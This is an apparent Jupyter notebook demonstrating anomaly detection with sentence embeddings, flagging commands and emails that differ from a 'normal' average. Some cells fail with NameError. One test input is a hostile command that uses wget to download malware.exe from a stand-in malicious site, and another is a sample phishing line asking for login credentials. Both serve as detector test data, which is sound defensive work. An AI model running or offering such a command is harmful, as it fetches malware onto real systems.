-------------------
### Anomaly detection using sentence embeddings 
- involves comparing incoming sentences to a model of normal behavior. When a sentence deviates significantly from the norm, it's flagged as an anomaly.
---------------------

In [1]:
from transformers import AutoModel, AutoTokenizer
from sentence_transformers import SentenceTransformer, util
import numpy as np

In [2]:
import os
os.environ["SENTENCE_TRANSFORMERS_HOME"] = r'D:\AI-DATASETS\07-Hugging-Face-Data\sentence-transformers'

In [3]:
# Load a pre-trained Sentence Transformer model
model_name = "paraphrase-MiniLM-L6-v2"
embedder = SentenceTransformer(model_name)

modules.json:   0%|          | 0.00/229 [00:00<?, ?B/s]

To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development


config_sentence_transformers.json:   0%|          | 0.00/122 [00:00<?, ?B/s]

README.md:   0%|          | 0.00/3.73k [00:00<?, ?B/s]

sentence_bert_config.json:   0%|          | 0.00/53.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/629 [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/90.9M [00:00<?, ?B/s]

tokenizer_config.json:   0%|          | 0.00/314 [00:00<?, ?B/s]

vocab.txt:   0%|          | 0.00/232k [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/466k [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/112 [00:00<?, ?B/s]



1_Pooling/config.json:   0%|          | 0.00/190 [00:00<?, ?B/s]

In [4]:
# Create a model of normal behavior (e.g., average embeddings)
normal_behavior = []

In [5]:
# Function to calculate sentence embeddings
def calculate_sentence_embedding(text):
    embeddings = embedder.encode(text, convert_to_tensor=True)
    return embeddings

In [6]:
import torch

In [7]:
# Create embeddings for normal behavior
normal_behavior = torch.mean(torch.stack([calculate_sentence_embedding(text) for text in stream_of_text_data[:2]]), dim=0)


NameError: name 'stream_of_text_data' is not defined

In [8]:
# Detect anomalies in the stream of text data
for i, sentence in enumerate(stream_of_text_data):
    if detect_anomaly(sentence, normal_behavior):
        print(f"Anomaly detected at index {i}: {sentence}")

NameError: name 'stream_of_text_data' is not defined

#### detect suspicious or malicious text in network traffic or logs

In [9]:
# Pseudo function for training a normal behavior model from a list of normal network commands
def train_normal_behavior_model(normal_network_commands):
    embeddings = np.array([embedder.encode(command) for command in normal_network_commands])
    return np.mean(embeddings, axis=0)

# Pseudo function for training a normal email content model from a list of normal emails
def train_normal_email_content_model(normal_emails):
    embeddings = np.array([embedder.encode(email_content) for email_content in normal_emails])
    return np.mean(embeddings, axis=0)

# Pseudo function to calculate cosine similarity between two sentence embeddings
def calculate_similarity(embedding, normal_behavior_model):
    return util.pytorch_cos_sim(embedding, normal_behavior_model)

# Pseudo function to send an alert
def alert(message):
    print(f"ALERT: {message}")

In [10]:
# Simulated network traffic or command data
normal_network_commands = ["ping server1", "list files", "connect to database", "shutdown server2"]
suspicious_command_to_check = "wget http://malicious-site.com/malware.exe"


In [11]:
# Train a model of normal behavior for network commands
normal_behavior_model = train_normal_behavior_model(normal_network_commands)


In [12]:
# Embed the suspicious command
embedding = np.array(embedder.encode(suspicious_command_to_check))

In [13]:
# Calculate cosine similarity to the normal behavior model
similarity_score = calculate_similarity(embedding, normal_behavior_model)

In [14]:
# Set a similarity threshold for flagging suspicious commands
threshold = 0.6

In [15]:
# Check if the similarity score is below the threshold
if similarity_score < threshold:
    alert("Suspicious command detected!")

ALERT: Suspicious command detected!


#### Another example

In [54]:
# Simulated email data
normal_emails = ["Hi, can you send me the report?", "Meeting at 3 PM", "Invoice attached.", "Important update."]
phishing_email_to_check = "Dear user, please provide your login credentials to resolve the issue."

In [55]:
# Train a model of normal email content
normal_email_content_model = train_normal_email_content_model(normal_emails)


In [56]:
# Embed the phishing email content
embedding = np.array(embedder.encode(phishing_email_to_check))


In [57]:
# Calculate cosine similarity to the normal email content model
similarity_score = calculate_similarity(embedding, normal_email_content_model)


In [58]:
# Set a similarity threshold for flagging phishing emails
threshold = 0.6

In [59]:
# Check if the cosine similarity score is below the threshold
if similarity_score < threshold:
    alert("Phishing attempt detected!")

ALERT: Phishing attempt detected!
